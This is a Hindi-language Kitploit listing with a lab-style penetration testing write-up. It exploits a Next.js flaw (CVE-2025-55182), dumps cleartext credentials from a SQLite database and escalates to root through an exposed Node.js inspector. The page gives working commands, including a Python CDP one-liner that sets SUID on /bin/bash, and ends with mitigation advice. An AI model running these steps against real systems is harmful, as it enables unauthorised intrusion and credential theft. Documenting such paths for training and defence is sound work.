Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-55182 — तकनीकी पैठ परीक्षण रिपोर्ट जो Next.js में CVE-2025-55182 के शोषण, SQLite से क्रेडेंशियल संग्रहण, और रूट एक्सेस प्राप्त करने के लिए Node.js इंस्पेक्टर के माध्यम से विशेषाधिकार वृद्धि का प्रदर्शन करती है। | Kitploit
उपकरण/GitHubGitHub/chrisbarack/cve-2025-55182
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubchrisbarack/cve-2025-55182

cve-2025-55182

तकनीकी पैठ परीक्षण रिपोर्ट जो Next.js में CVE-2025-55182 के शोषण, SQLite से क्रेडेंशियल संग्रहण, और रूट एक्सेस प्राप्त करने के लिए Node.js इंस्पेक्टर के माध्यम से विशेषाधिकार वृद्धि का प्रदर्शन करती है।

रिपॉजिटरी देखें
721 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

पेनेट्रेशन टेस्टिंग राइटअप: Next.js RCE और Node.js इंस्पेक्टर प्रिविलेज एस्केलेशन

यह तकनीकी राइटअप एक कमजोर Next.js वेब एप्लिकेशन होस्ट करने वाले टारगेट से समझौता करने, एकत्रित क्रेडेंशियल्स के माध्यम से प्रारंभिक एक्सेस प्राप्त करने, और रूट प्रिविलेज एस्केलेशन के लिए गलत कॉन्फ़िगर किए गए स्थानीय Node.js V8 इंस्पेक्टर का लाभ उठाने के शोषण पथ का विवरण देता है।

चरण 1: बाहरी रिकॉनिसेंस और वेब शोषण

प्रारंभिक फुटप्रिंटिंग

टारगेट मानक HTTP/HTTPS पोर्ट्स (80/443) पर चलने वाला एक Next.js वेब एप्लिकेशन होस्ट करता है। मानक डायरेक्ट्री एन्यूमरेशन और मैन्युअल विश्लेषण इंगित करता है कि एप्लिकेशन CVE-2025-55182 के लिए कमजोर संस्करण चला रहा है।

Burp Suite के माध्यम से शोषण

कमजोरी का शोषण करने के लिए, Burp Suite (या Burp Repeater) का उपयोग करके एप्लिकेशन ट्रैफ़िक को इंटरसेप्ट करें और CVE-2025-55182 को लक्षित करने वाला एक क्राफ्टेड शोषण पेलोड इंजेक्ट करें।

डेटाबेस खोज

शोषण के माध्यम से कोड निष्पादन और स्थानीय फ़ाइल पठन प्राप्त करने पर, एप्लिकेशन स्रोत डायरेक्ट्री का निरीक्षण करें। स्थानीय SQLite डेटाबेस फ़ाइल (database.db) मुख्य एप्लिकेशन स्रोत कोड के निकट स्थित है।

चरण 2: क्रेडेंशियल्स निकालना और प्रारंभिक एक्सेस

डेटाबेस का निरीक्षण

संग्रहीत उपयोगकर्ता रिकॉर्ड निकालने के लिए डेटाबेस फ़ाइल की सामग्री को क्वेरी या डंप करें।

root@kitploit:~
sqlite3 database.db "SELECT * FROM users;"

क्रेडेंशियल निष्कर्षण

स्थानीय SSH उपयोगकर्ता engineer से जुड़ा क्लियरटेक्स्ट पासवर्ड खोजें।

SSH लॉगिन

टारगेट मशीन के साथ SSH सत्र स्थापित करने के लिए पुनर्प्राप्त क्रेडेंशियल्स का उपयोग करें:

root@kitploit:~
ssh engineer@<TARGET-IP>

यूज़र फ़्लैग पुनर्प्राप्ति

प्रमाणित होने के बाद, होम डायरेक्टरी में स्थित यूज़र फ़्लैग पढ़ें:

root@kitploit:~
cat /home/engineer/user.txt

चरण 3: Node.js इंस्पेक्टर के माध्यम से प्रिविलेज एस्केलेशन

आंतरिक पोर्ट रिकॉनिसेंस

आंतरिक हमले की सतहों की पहचान करने के लिए केवल स्थानीय लूपबैक इंटरफ़ेस (127.0.0.1) से बंधी सेवाओं की जाँच करें:

root@kitploit:~
netstat -tulnp

परिणाम: एक आंतरिक Node.js सेवा स्थानीय पोर्ट 9229 पर सक्रिय रूप से सुन रही है।

डीबगर UUID की खोज

Node.js V8 डीबग पोर्ट्स को WebSocket संचार के लिए एक अद्वितीय सत्र UUID की आवश्यकता होती है। /json जोड़कर curl का उपयोग करके स्थानीय डिस्कवरी एंडपॉइंट को क्वेरी करें:

root@kitploit:~
curl -s http://127.0.0.1:9229/json

आउटपुट:

root@kitploit:~
{
  "webSocketDebuggerUrl": "ws://127.0.0.1:9229/46a680a0-1cf5-4af4-9ce6-474f77329639"
}

प्रिविलेज एस्केलेशन पेलोड निष्पादित करना

क्योंकि टारगेट Node.js प्रक्रिया रूट प्रिविलेजेस के साथ चलती है, आप /bin/bash पर SUID बिट सेट करने के लिए WebSockets पर Python के माध्यम से एक Chrome DevTools प्रोटोकॉल (CDP) Runtime.evaluate संदेश भेज सकते हैं:

root@kitploit:~
python3 -c 'import websocket, json; ws = websocket.create_connection("ws://127.0.0.1:9229/<YOUR-UUID>"); ws.send(json.dumps({"id": 1, "method": "Runtime.evaluate", "params": {"expression": "process.mainModule.require(\"child_process\").execSync(\"chmod +s /bin/bash\")"}})); print(ws.recv()); ws.close()'

रूट शेल में प्रवेश

सत्यापित करें कि /bin/bash में अब SUID अनुमतियाँ सक्षम हैं (-rwsr-sr-x), फिर प्रिविलेजेस को संरक्षित करते हुए Bash को आमंत्रित करें:

root@kitploit:~
ls -l /bin/bash
bash -p

रूट फ़्लैग पुनर्प्राप्त करना

अंतिम फ़्लैग कैप्चर करने के लिए रूट उपयोगकर्ता की होम डायरेक्टरी पर नेविगेट करें:

root@kitploit:~
cd /root
cat root.txt

इन वेक्टरों के विरुद्ध वातावरण को सुरक्षित करने के लिए ज्ञात CVEs के लिए कमजोर वेब एप्लिकेशनों को पैच करना, डेटाबेस फ़ाइल अनुमतियों को ठीक से प्रतिबंधित करना, और यह सुनिश्चित करना आवश्यक है कि डीबगिंग पोर्ट्स (जैसे पोर्ट 9229 पर Node.js इंस्पेक्टर) प्रोडक्शन वातावरण में कभी भी उजागर न हों या प्रमाणीकरण के बिना सुलभ न छोड़े जाएँ।

टूल डाउनलोड करें